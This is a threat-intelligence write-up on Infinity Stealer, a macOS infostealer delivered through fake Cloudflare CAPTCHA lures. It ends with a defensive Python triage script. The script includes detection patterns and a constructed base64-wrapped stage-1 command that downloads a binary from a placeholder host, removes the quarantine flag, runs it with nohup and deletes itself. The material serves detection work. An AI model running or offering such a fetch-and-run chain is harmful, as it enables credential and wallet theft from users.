

Infinity Stealer macOS infostealer delivered via ClickFix CAPTCHA lures


Summary


A new macOS-targeting infostealer named Infinity Stealer is being distributed via ClickFix CAPTCHA lures impersonating Cloudflare’s human verification, leading victims to execute a base64-obfuscated Bash command that fetches and runs a Nuitka-compiled Python payload. The attack abuses a fake CAPTCHA on update-check[.]com to bypass OS defenses and install a Mach-O loader that extracts a zstd-compressed archive containing the stealer. Infinity Stealer harvests browser credentials, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets from developer files, exfiltrates the data via HTTP POST to a C2 server, and notifies its operators via Telegram.

Timeline

  1. 28.03.2026 16:35

    Nuitka-compiled Infinity Stealer malware deployed via ClickFix CAPTCHA lures on macOS

    Malware distribution begins with a fake Cloudflare CAPTCHA on update-check[.]com that instructs users to paste a base64-obfuscated curl command into Terminal. The command fetches and executes a Nuitka-compiled Mach-O loader (8.6 MB) that unpacks a 35 MB zstd archive to deploy the Infinity Stealer payload (UpdateHelper.bin). The infostealer performs anti-analysis checks and then collects browser credentials, Keychain data, cryptocurrency wallets, and plaintext secrets from developer files before exfiltrating them via HTTP POST to a C2 server and notifying operators via Telegram.


Information Snippets

  • Infinity Stealer is a Python-based macOS infostealer compiled with the open-source Nuitka compiler into a native Mach-O binary to evade static analysis.

  • The initial access vector uses ClickFix CAPTCHA lures mimicking Cloudflare on update-check[.]com, prompting users to paste a base64-obfuscated curl command into Terminal.

  • The pasted command decodes a Bash script that writes the stage-2 Nuitka loader to /tmp, removes the quarantine flag, and executes it via nohup, passing C2 and token via environment variables before self-deletion.

  • The Nuitka loader is an 8.6 MB Mach-O binary containing a 35 MB zstd-compressed archive that extracts UpdateHelper.bin, the Infinity Stealer payload.

  • Infinity Stealer performs anti-analysis checks for virtualization or sandboxing before proceeding to data collection.

  • The stealer collects credentials from Chromium-based browsers and Firefox, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets in .env files.

  • Stolen data is exfiltrated via HTTP POST requests to a C2 server, and a Telegram notification is sent to the operators upon completion of the operation.

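Defensive triage of a pasted ClickFix one-liner, based on the behaviours the snippets above attribute to the decoded stage-1 Bash script (write to /tmp, quarantine flag removal, nohup execution, environment-variable passing, self-deletion). This is an added example, not code from the original page or from any vendor tooling; the regex indicators, the host c2.example.invalid and both sample command lines are constructed assumptions.

```python
"""Triage a ClickFix-style "paste this into Terminal" one-liner (added example)."""
import base64
import binascii
import re

# Behaviours the page attributes to the decoded stage-1 Bash script.
INDICATORS = {
    "quarantine_removal": re.compile(r"xattr\s+(?:-\w+\s+)*com\.apple\.quarantine"),
    "background_exec": re.compile(r"\bnohup\b"),
    "download_to_tmp": re.compile(r"\bcurl\b[^\n;|&]*/tmp/"),
    "pipe_to_shell": re.compile(r"\|\s*(?:ba|z)?sh\b"),
    "env_passing": re.compile(r"\b[A-Z_][A-Z0-9_]+=\S+\s+(?:nohup|/tmp/)"),
    "self_delete": re.compile(r"\brm\s+(?:-+\w*\s+)*[\"']?\$0"),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

def decode_blobs(cmd):
    """Return every base64 blob in cmd that decodes to printable UTF-8 text."""
    layers = []
    for blob in B64_BLOB.findall(cmd):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not base64, or not a text script: skip this blob
        if text.replace("\n", "").replace("\t", "").isprintable():
            layers.append(text)
    return layers

def triage(cmd):
    """Return the sorted indicator names found in cmd or in any decoded layer."""
    hits = set()
    for layer in [cmd] + decode_blobs(cmd):
        hits.update(name for name, rx in INDICATORS.items() if rx.search(layer))
    return sorted(hits)

def verdict(cmd, threshold=2):
    """'suspicious' when at least `threshold` indicators co-occur, else 'clean'."""
    return "suspicious" if len(triage(cmd)) >= threshold else "clean"

# Constructed samples (not taken from the page). c2.example.invalid is a placeholder.
STAGE1 = (
    "curl -fsSL https://c2.example.invalid/u -o /tmp/UpdateHelper\n"
    "xattr -d com.apple.quarantine /tmp/UpdateHelper\n"
    "C2=c2.example.invalid TOKEN=placeholder nohup /tmp/UpdateHelper >/dev/null 2>&1 &\n"
    'rm -f -- "$0"\n'
)
CLICKFIX_CMD = "echo " + base64.b64encode(STAGE1.encode()).decode() + " | base64 -d | bash"
BENIGN_CMD = "echo " + base64.b64encode(b"echo 'routine maintenance note'").decode() + " | base64 -d"
```

The outer layer alone only shows the pipe into bash; the decoded layer is where the remaining indicators surface, which is why the check decodes before matching.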